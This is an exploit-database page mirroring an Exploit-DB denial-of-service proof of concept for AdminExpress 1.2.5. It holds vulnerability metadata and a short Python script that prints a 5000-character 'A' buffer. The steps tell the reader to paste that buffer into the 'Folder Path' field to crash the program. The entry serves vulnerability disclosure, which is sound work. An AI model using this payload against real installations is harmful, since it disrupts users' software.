header-logo
Suggest Exploit
vendor:
AdminExpress
by:
Mücahit İsmail Aktaş
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: AdminExpress
Affected Version From: 1.2.5
Affected Version To: 1.2.5.485
Patch Exists: Yes
Related CWE: N/A
CPE: admin-express.en.softonic.com
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows XP Professional SP2
2019

AdminExpress 1.2.5 – Denial of Service (PoC)

AdminExpress 1.2.5 is vulnerable to a denial of service attack. To exploit the vulnerability, an attacker must click the 'System Compare' button, paste a payload of 5000 'A' characters into the 'Folder Path' field, and click the scales icon on the right side of the 'Folder Path' field.

Mitigation:

Upgrade to the latest version of AdminExpress 1.2.5.
Source

Exploit-DB raw data:

# -*- coding: utf-8 -*-
#!/usr/bin/python

# Exploit Title: AdminExpress 1.2.5 - Denial of Service (PoC)
# Date: 2019-04-12
# Exploit Author: Mücahit İsmail Aktaş
# Software Link: https://admin-express.en.softonic.com/
# Version: 1.2.5.485
# Tested on: Windows XP Professional SP2

# Description:
#
# 1) Click the "System Compare" button
# 2) Paste the payload in the "Folder Path" (left)
# 3) Click the scales icon (in the middle, right side of "Folder Path")
#


buffer = "A" * 5000

print("Payload: \n\n" + buffer + "\n")

Navigation

Suggest Exploit

Services By CQR